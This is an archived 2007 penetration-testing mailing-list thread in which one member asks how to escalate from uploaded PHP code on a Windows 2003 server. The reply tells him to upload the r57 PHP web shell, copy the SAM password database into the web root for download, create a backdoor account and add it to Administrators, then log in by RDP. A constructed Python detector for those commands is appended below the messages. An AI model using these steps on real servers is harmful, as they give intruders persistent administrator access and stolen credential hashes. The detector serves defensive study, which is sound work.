Re: PHP Exploitation

From: DokFLeed (dokfleed@dokfleed.net)
Date: Sun Nov 25 2007 - 02:12:24 EST


I assume it's for the good cause, and you are authorized to do so?!

Upload this to the server
http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=46
encoded for Zend Optimizer
Or
http://no.spam.ee/~tonu/phpshell/r57shell.txt

Try the following commands:
=====================
1) To see what's running on the system
    tasklist -SVC
2) To get a copy of the sam database
    copy C:\windows\repair\sam C:\www\sam.txt
    http://hostname/sam.txt
3) To add a new user with username tested123 & password tested123
    net user tested123 tested123 /add /active:yes /expires:never /passwordchg:yes /passwordreq:yes
4) To make him Administrator
    net localgroup Administrators tested123 /add
5) Try to RDP to the server, if it is Firewalled!!
Download the RDP web front "Remote Desktop Connection Web Connection
Software (455 KB)"
Start IIS http://hostname /TSweb/
and log to Localhost

Remember, while testing, your imagination is your limitation :)
Depending on your phpinfo output, none of this might work, so you will have
to code around it.

Dok
Smoke Dope, Eat Soap, Fly Home in a Bubble

==================
----- Original Message -----
From: "Danux" <danuxx@gmail.com>
To: <pen-test@securityfocus.com>
Sent: Friday, November 23, 2007 6:29 AM
Subject: PHP Exploitation

> Hi experts, I need your ideas,
>
> By now, I am able to upload php files to a Windows 2003 Server, so I
> can execute php code like phpinfo, but I can't execute passthru command
> because of lack of IUSR_MACHINE privileges.
> I have run some local php bof's without success.
>
> Do you have another idea to break into the server through php code
> uploaded?
>
> Cheers!!!!!
>
> --
> Danux, CISSP
> Chief Information Security Officer
> Macula Security Consulting Group
> www.macula-group.com
>
> ------------------------------------------------------------------------
> This list is sponsored by: Cenzic
>
> Need to secure your web apps NOW?
> Cenzic finds more, "real" vulnerabilities fast.
> Click to try it, buy it or download a solution FREE today!
>
> http://www.cenzic.com/downloads
> ------------------------------------------------------------------------
>
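
Added example, not part of either message: a defender-side check that flags the commands listed in the reply (tasklist with the service switch, a copy of the repair SAM file, net user /add, net localgroup Administrators /add) in process-creation records. The tab-separated record layout, the rule names and the WEB_PARENTS set are assumptions, and the sample records are constructed.

```python
import re

# Patterns for the commands listed in the reply above.
RULES = [
    ("service-enumeration", re.compile(r"\btasklist(\.exe)?\b.*[-/]svc\b", re.I)),
    ("sam-backup-copy", re.compile(r"\bcopy\b.*\\repair\\sam\b", re.I)),
    ("local-account-created",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I)),
    ("admin-group-add",
     re.compile(r'\bnet1?(\.exe)?\s+localgroup\s+"?administrators"?\s+\S+.*\s/add\b',
                re.I)),
]

# Assumption: images that run PHP on the monitored host (IIS worker, PHP CGI).
WEB_PARENTS = {"w3wp.exe", "php-cgi.exe", "php.exe"}

# Constructed sample records: time <TAB> parent image <TAB> command line.
SAMPLE = (
    "10:01:10\tw3wp.exe\tcmd.exe /c tasklist -SVC\n"
    "10:01:42\tphp-cgi.exe\tcmd.exe /c copy C:\\windows\\repair\\sam C:\\www\\sam.txt\n"
    "10:02:05\tw3wp.exe\tnet user tested123 tested123 /add /active:yes /expires:never\n"
    "10:02:19\tw3wp.exe\tnet localgroup Administrators tested123 /add\n"
    "10:30:00\tcmd.exe\ttasklist /svc\n"
    "10:31:00\tcmd.exe\tnet user\n"
    "10:32:00\tcmd.exe\tnet localgroup Administrators\n"
)


def scan(lines):
    """Return (time, rule, severity) for every record that matches a rule."""
    hits = []
    for line in lines:
        parts = line.rstrip("\n").split("\t", 2)
        if len(parts) != 3:
            continue  # skip malformed records instead of raising
        when, parent, cmdline = parts
        # A web-serving parent means the web application stack spawned the command.
        severity = "high" if parent.lower() in WEB_PARENTS else "review"
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((when, name, severity))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE.splitlines()):
        print(*hit)
```

Listing commands such as a bare "net user" do not match; only the forms that change state or stage the SAM file do, and the severity rises when the parent is a web-serving process.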

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:13 EDT